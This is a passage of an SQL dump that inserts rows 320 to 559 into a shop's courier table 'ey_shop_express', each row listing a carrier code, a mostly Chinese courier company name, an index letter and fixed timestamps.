INSERT INTO `ey_shop_express` VALUES ('320', 'quansutong', '全速通国际快递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('321', 'qinyuan', '秦远物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('322', 'qichen', '启辰国际物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('323', 'quansu', '全速快运', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('324', 'qzx56', '全之鑫物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('325', 'qskdyxgs', '千顺快递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('326', 'zqlwl', '青旅物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('327', 'quanchuan56', '全川物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('328', 'quantwl', '全通快运', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('329', 'yatexpress', '乾坤物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('330', 'guexp', '全联速运', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('331', 'bjqywl', '青云物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('332', 'signedexpress', '签收快递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('333', 'express7th', '7号速递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('334', 'riyuwuliu', '日昱物流', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('335', 'rfsd', '瑞丰速递', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('336', 'rrs', '日日顺物流', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('337', 'rytsd', '日益通速递', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('338', 'rrskx', '日日顺快线', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('339', 'gdrz58', '容智快运', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('340', 'rrthk', '日日通国际', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('341', 'homecourier', '如家国际快递', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('342', 'sewl', '速尔快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('343', 'haihongwangsong', '山东海红', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('344', 'sh', '盛辉物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('345', 'sfwl', '盛丰物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('346', 'shiyunkuaidi', '世运快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('347', 'shangda', '上大物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('348', 'stsd', '三态速递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('349', 'saiaodi', '赛澳递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('350', 'ewl', '申通E物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('351', 'shenganwuliu', '圣安物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('352', 'sxhongmajia', '山西红马甲', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('353', 'suijiawuliu', '穗佳物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('354', 'syjiahuier', '沈阳佳惠尔', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('355', 'shlindao', '上海林道货运', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('356', 'sfift', '十方通物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('357', 'shunjiefengda', '顺捷丰达', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('358', 'subida', '速必达物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('359', 'stcd', '速通成达物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('360', 'stkd', '顺通快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('361', 'sendtochina', '速递中国', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('362', 'sihaiet', '四海快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('363', 'staky', '首通快运', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('364', 'hnssd56', '顺时达物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('365', 'superb', 'Superb Grace', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('366', 'sfjhd', '圣飞捷快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('367', 'sofast56', '嗖一下同城快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('368', 's2c', 'S2C', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('369', 'chinasqk', 'SQK国际速递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('370', 'shunshid', '顺士达速运', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('371', 'synship', 'SYNSHIP快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('372', 'shandiantu', '闪电兔', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('373', 'sdsy888', '首达速运', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('374', 'sczpds', '速呈宅配', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('375', 'sureline', 'Sureline冠泰', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('376', 'stosolution', '申通国际', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('377', 'sycawl', '狮爱高铁物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('378', 'sxexpress', '三象速递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('379', 'shangqiao56', '商桥物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('380', 'shd56', '商海德物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('381', 'shenma', '神马快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('382', 'sihiexpress', '四海捷运', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('383', 'superoz', '速配鸥翼', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('384', 'fastgoexpress', '速派快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('385', 'zjstky', '苏通快运', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('386', 'suning', '苏宁物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('387', 'shaoke', '捎客物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('388', 'sdto', '速达通跨境物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('389', 'sut56', '速通物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('390', 'sundarexpress', '顺达快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('391', 'sxjdfreight', '顺心捷达', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('392', 'shengtongscm', '盛通快递', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('393', 'tnt', 'TNT快递', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('394', 'tt', '天天快递', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('395', 'tianzong', '天纵物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('396', 'chinatzx', '同舟行物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('397', 'nntengda', '腾达速递', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('398', 'sd138', '泰国138', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('399', 'tongdaxing', '通达兴物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('400', 'tlky', '天联快运', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('401', 'ibenben', '途鲜物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('402', 'krtao', '淘韩国际快递', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('403', 'lntjs', '特急送', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('404', 'tny', 'TNY物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('405', 'djy56', '天翔东捷运', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('406', 'guoeryue', '天天快物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('407', 'tianma', '天马迅达', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('408', 'surpassgo', '天越物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('409', 'tianxiang', '天翔快递', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('410', 'tywl99', '天翼物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('411', 'shpost', '同城快寄', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('412', 'humpline', '驼峰国际', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('413', 'transrush', 'TransRush', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('414', 'tstexp', 'TST速运通', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('415', 'ctoexp', '泰国中通CTO', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('416', 'thaizto', '泰国中通ZTO', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('417', 'tswlcloud', '天使物流云', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('418', 'tzky', '铁中快运', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('419', 'tcxbthai', 'TCXB国际物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('420', 'taimek', '天美快递', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('421', 'taoplus', '淘布斯国际物流', 'T', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('422', 'ups', 'UPS快递查询', 'U', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('423', 'yskd', '优速快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('424', 'usps', 'USPS美国邮政', 'U', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('425', 'ueq', 'UEQ快递', 'U', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('426', 'uex', 'UEX国际物流', 'U', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('427', 'utaoscm', 'UTAO 优到', 'U', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('428', 'wxwl', '万象物流', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('429', 'weitepai', '微特派', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('430', 'wjwl', '万家物流', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('431', 'wanboex', '万博快递', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('432', 'wtdchina', '威时沛运', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('433', 'wzhaunyun', '微转运', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('434', 'gswtkd', '万通快递', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('435', 'wandougongzhu', '豌豆物流', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('436', 'wjkwl', '万家康物流', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('437', 'vps', '维普恩物流', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('438', 'wykjt', '51跨境通', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('439', 'wherexpess', '威盛快递', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('440', 'weilaimingtian', '未来明天快递', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('441', 'wdm', '万达美', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('442', 'wto56kj', '温通物流', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('443', '56kuaiyun', '五六快运', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('444', 'wowvip', '沃埃家', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('445', 'grivertek', '潍鸿', 'W', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('446', 'xbwl', '新邦物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('447', 'xfwl', '信丰物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('448', 'newegg', '新蛋物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('449', 'xianglongyuntong', '祥龙运通物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('450', 'xianchengliansudi', '西安城联速递', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('451', 'xilaikd', '喜来快递', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('452', 'xsrd', '鑫世锐达', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('453', 'xtb', '鑫通宝物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('454', 'xintianjie', '信天捷快递', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('455', 'xaetc', '西安胜峰', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('456', 'xianfeng', '先锋快递', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('457', 'sunspeedy', '新速航', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('458', 'xipost', '西邮寄', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('459', 'sinatone', '信联通', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('460', 'sunjex', '新杰物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('461', 'alog', '心怡物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('462', 'csxss', '新时速物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('463', 'xiangteng', '翔腾物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('464', 'westwing', '西翼物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('465', 'littlebearbear', '小熊物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('466', 'huanqiuabc', '中国香港环球快运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('467', 'xinning', '新宁物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('468', 'wlwex', '星空国际', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('469', 'yyexp', '西安运逸快递', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('470', 'xiyoug', '西游寄', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('471', 'xlobo', 'xLobo', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('472', 'xunsuexpress', '迅速快递', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('473', 'whgjkd', '香港伟豪国际物流', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('474', 'xyd666', '鑫远东速运', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('475', 'xdexpress', '迅达速递', 'X', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('476', 'ytkd', '运通快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('477', 'ycwl', '远成物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('478', 'yfsd', '亚风速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('479', 'yishunhang', '亿顺航', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('480', 'yfwl', '越丰物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('481', 'yad', '源安达快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('482', 'yfh', '原飞航物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('483', 'yinjiesudi', '银捷速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('484', 'yitongfeihong', '一统飞鸿', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('485', 'yuxinwuliu', '宇鑫物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('486', 'yitongda', '易通达', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('487', 'youbijia', '邮必佳', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('488', 'yiqiguojiwuliu', '一柒物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('489', 'yinsu', '音素快运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('490', 'yilingsuyun', '亿领速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('491', 'yujiawuliu', '煜嘉物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('492', 'gml', '英脉物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('493', 'leopard', '云豹国际货运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('494', 'czwlyn', '云南中诚', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('495', 'sdyoupei', '优配速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('496', 'yongchang', '永昌物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('497', 'yufeng', '御风速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('498', 'yousutongda', '优速通达', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('499', 'yongwangda', '永旺达快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('500', 'yingchao', '英超物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('501', 'edlogistics', '益递物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('502', 'yjxlm', '宜家行', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('503', 'onehcang', '一号仓', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('504', 'ycgky', '远成快运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('505', 'yunfeng56', '韵丰物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('506', 'iyoungspeed', '驿扬国际速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('507', 'zgyzt', '一站通快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('508', 'eupackage', '易优包裹', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('509', 'ydglobe', '云达通', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('510', 'el56', 'YLTD', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('511', 'yundx', '运东西', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('512', 'yangbaoguo', '洋包裹', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('513', 'uluckex', '优联吉运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('514', 'ecmscn', '易客满', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('515', 'ubonex', '优邦速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('516', 'yue777', '玥玛速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('517', 'ywexpress', '远为快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('518', 'ezhuanyuan', '易转运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('519', 'yiqisong', '一起送', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('520', 'yongbangwuliu', '永邦国际物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('521', 'yyox', '邮客全球速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('522', 'yihangmall', '易航物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('523', 'yiouzhou', '易欧洲国际物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('524', 'ykouan', '洋口岸', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('525', 'youyou', '优优速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('526', 'ytky168', '运通快运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('527', 'sixroad', '易普递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('528', 'yourscm', '雅澳物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('529', 'euguoji', '易邮国际', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('530', 'uscbexpress', '易境达国际物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('531', 'yfsuyun', '驭丰速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('532', 'yimidida', '壹米滴答', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('533', 'ugoexpress', '邮鸽速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('534', 'youban', '邮邦国际', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('535', 'hkems', '云邮跨境快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('536', 'youlai', '邮来速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('537', 'eta100', '易达国际速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('538', 'yatfai', '一辉物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('539', 'yzswuliu', '亚洲顺物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('540', 'yifankd', '艺凡快递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('541', 'mantoo', '优能物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('542', 'vctrans', '越中国际物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('543', 'yhtlogistics', '宇航通物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('544', 'ycgglobal', 'YCG物流', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('545', 'yidihui', '驿递汇速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('546', 'yuanhhk', '远航国际快运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('547', 'yiyou', '易邮速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('548', 'eusacn', '优莎速运', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('549', 'uhi', '优海国际速递', 'Y', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('550', 'zjs', '宅急送', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('551', 'ztky', '中铁快运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('552', 'ztwl', '中铁物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('553', 'zywl', '中邮物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('554', 'zhimakaimen', '芝麻开门', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('555', 'zhengzhoujianhua', '郑州建华', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('556', 'zhongsukuaidi', '中速快件', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('557', 'zhongtianwanyun', '中天万运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('558', 'zhongruisudi', '中睿速递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('559', 'zhongwaiyun', '中外运速递', 'Z', '1', '100', '1553911076', '1553911076');
